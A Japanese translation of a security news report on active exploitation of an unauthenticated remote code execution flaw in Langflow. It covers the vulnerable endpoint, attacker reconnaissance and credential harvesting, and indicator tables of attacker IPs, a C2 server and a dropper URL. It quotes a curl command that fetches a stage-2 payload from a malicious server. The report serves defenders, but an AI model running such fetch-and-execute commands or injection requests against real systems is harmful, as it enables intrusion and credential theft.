Langflow RCE Flaw Lets Attackers Execute Arbitrary Python Code Without Authentication
2026/06/25 gbhackers — Langflow のリモートコード実行 (RCE) 脆弱性 CVE-2026-33017 が、情報の開示から数時間以内に実環境で積極的に悪用されている。この脆弱性を悪用する攻撃者は、認証を必要とすることなく、公開されているインスタンス上で任意の Python コードを実行できる。この脆弱性が影響を及ぼす範囲は、LLM を活用するパイプラインおよび Retrieval-Augmented Generation (RAG) システムの構築で広く利用されている、オープンソースの AI ワークフロー・フレームワークとなる。これにより、AI 主導の環境における攻撃対象領域が大幅に拡大する。

Langflow の RCE 脆弱性
この欠陥は、認証を必要とせずにフローを構築できる、公開アクセス可能な POST /api/v1/build_public_tmp/{flow_id}/flow エンドポイントに存在する。
入力に対する不適切な検証と、サンドボックス化の欠落を突く攻撃者は、フロー・ノード定義に対して悪意の Python コードを注入できる。このコードはサーバ側で実行されるため、細工された 1 回の HTTP リクエストだけで、完全なコマンド実行の能力が取得されてしまう。
Sysdig の Threat Research Team (TRT) による観測では、2026年3月17日に公開アドバイザリがリリースされてから約 20 時間後に、この脆弱性の悪用が始まっている。
注目すべきことに、攻撃者は公開されている概念実証 (PoC) エクスプロイトに依存せず、アドバイザリに含まれる詳細から、この脆弱性を武器化していた。初期の攻撃においては、Nuclei などの自動スキャン・ツールを介したシステム・コマンド (例:id) などが実行された。続いて、その出力が Base64 でエンコードされ、Interactsh コールバック・ドメインを介して結果を流出させるペイロードが埋め込まれた。
初期の悪用試行は、”77.110.106[.]154″ および “209.97.165[.]247” などの複数の IP アドレスから発信されており、協調したスキャン活動を示唆している。これらの自動プローブは、カスタム Python スクリプトを利用する、より高度な攻撃へと急速に進化した。
脅威アクターは、ディレクトリの一覧取得や、/etc/passwd などの機密ファイルへのアクセス、リモート・シェル・コマンドなどを介して、第 2 段階ペイロードによる偵察を実施した。そこで用いられたのは、curl -fsSL http://<malicious-server>/z のようなコマンドである。
より高度な段階で攻撃者が注力したのは、認証情報の収集および環境の列挙である。venv などのコマンドを実行し、.env ファイルおよびデータベース・ファイルを検索することで、API キー/データベース認証情報/クラウド・アクセス・トークンなどを抽出した。
Langflow インスタンスが、AWS/OpenAI/各種データベースなどの外部サービスと統合されることが多い AI 環境において、上記の機密データにより、ラテラル・ムーブメントやソフトウェア・サプライチェーン侵害が引き起こされる可能性がある。
攻撃インフラでは、重複する指標が明らかになっており、協調したキャンペーンまたは共有ツールの利用が示唆されている。複数の攻撃者が “143.110.183[.]86:8080” にホストされたコマンド&コントロール (C2) サーバに対して、窃取したデータを流出させていた。
それと同時に、第 2 段階のペイロードは “173.212.205[.]251:8443” から配信されていた。複数のトップレベル・ドメインにまたがる、短命の Interactsh ドメインの悪用が示すのは、Out-of-Band (OOB) チャネルを介した、秘匿性の高いデータの流出である。
セキュリティ研究者たちが強調するのは、悪用に至るまでの時間が、わずか数時間へと劇的に短縮されている、この種のインシデントの広範な傾向である。
多くのケースにおける、数日から数週間に及ぶ従来のパッチ適用サイクルでは、もはや十分ではない。ユーザー組織にとって必要なことは、急速に武器化される脅威を緩和するための、ランタイム検出/ネットワーク分離/プロアクティブ監視の導入である。
IoC
Source IPs
| IP | Location (Geo) | ASN / Provider | Observed Activity |
|---|---|---|---|
| 77.110.106.154 | DE (Frankfurt) | AEZA GROUP LLC | Nuclei scan against Langflow, Interactsh-based callback RCE |
| 209.97.165.247 | SG (Singapore) | DigitalOcean | Nuclei scan, Interactsh callback test of id command |
| 188.166.209.86 | SG (Singapore) | DigitalOcean | Nuclei scan, Interactsh callback, identical Python RCE payload |
| 205.237.106.117 | FR (Paris) | PUSHPKT OU | Nuclei scan with rotated User-Agent strings, Interactsh exfil |
| 83.98.164.238 | NL (Lelystad) | Accenture B.V. | Custom exploit script, recon (ls, cat /etc/passwd), stage-2 |
| 173.212.205.251 | FR (Lauterbourg) | Contabo GmbH | Custom exploit, env/credential harvesting, dropper hosting |
C2 and Staging Infrastructure
| Indicator | Type | Geo / Provider | Context |
|---|---|---|---|
| 143.110.183.86:8080 | C2 server | IN, DigitalOcean | Receives base64-encoded exfiltrated command output |
| 173.212.205.251:8443 | Dropper host | FR, Contabo GmbH | Serves stage-2 payload from path /z |
Malicious Dropper URLs
| URL | Role | Notes |
|---|---|---|
| http://143.110.183.86:8080/ | C2 / exfil endpoint | Receives HTTP exfil from Python RCE |
| http://173.212.205.251:8443/z | Stage-2 dropper | Bash-executed payload delivery |
Interactsh Callback Domains (Samples)
| Domain | TLD | Usage |
|---|---|---|
| d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live | .oast.live | OOB validation of id command output |
| d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me | .oast.me | Automated Nuclei-driven callback |
| d6td5s9qte0bea7273e0wuou77jjx77uk.oast.pro | .oast.pro | RCE payload result exfiltration |
| d6tgbe1qte0a8rkffb3gqabqm8517exd3.oast.fun | .oast.fun | Ephemeral callback for scanning activity |
注:IP アドレスおよびドメインは、意図しない名前解決やハイパーリンク化を防ぐため、意図的に無害化されている (例:[.] )。再度有効化するのは、MISP、VirusTotal、または SIEM など、管理された脅威インテリジェンス・プラットフォーム内に限定すべきである。
訳者後書:AI の処理手順を構築するフレームワークにおいて、脆弱性の公開直後を狙う攻撃が相次いでいます。この問題の背景には、外部からのデータ受け入れ時における検証不足や、安全な隔離環境の欠如という運用の隙があります。この種の欠陥が悪用されると、サーバ内での不正なプログラム実行が引き起こされ、連携しているクラウドの接続鍵や重要な設定情報を盗み出される恐れがあります。対応策として、外部からの不審な接続を遮断するネットワーク分離が必要となります。その上で、最新の修正情報を常に収集し、異常なプログラムの動きを即座に検知できる監視体制を整えることが大切です。よろしければ、関連情報としての Langflow での検索結果も、ご参照ください。
You must be logged in to post a comment.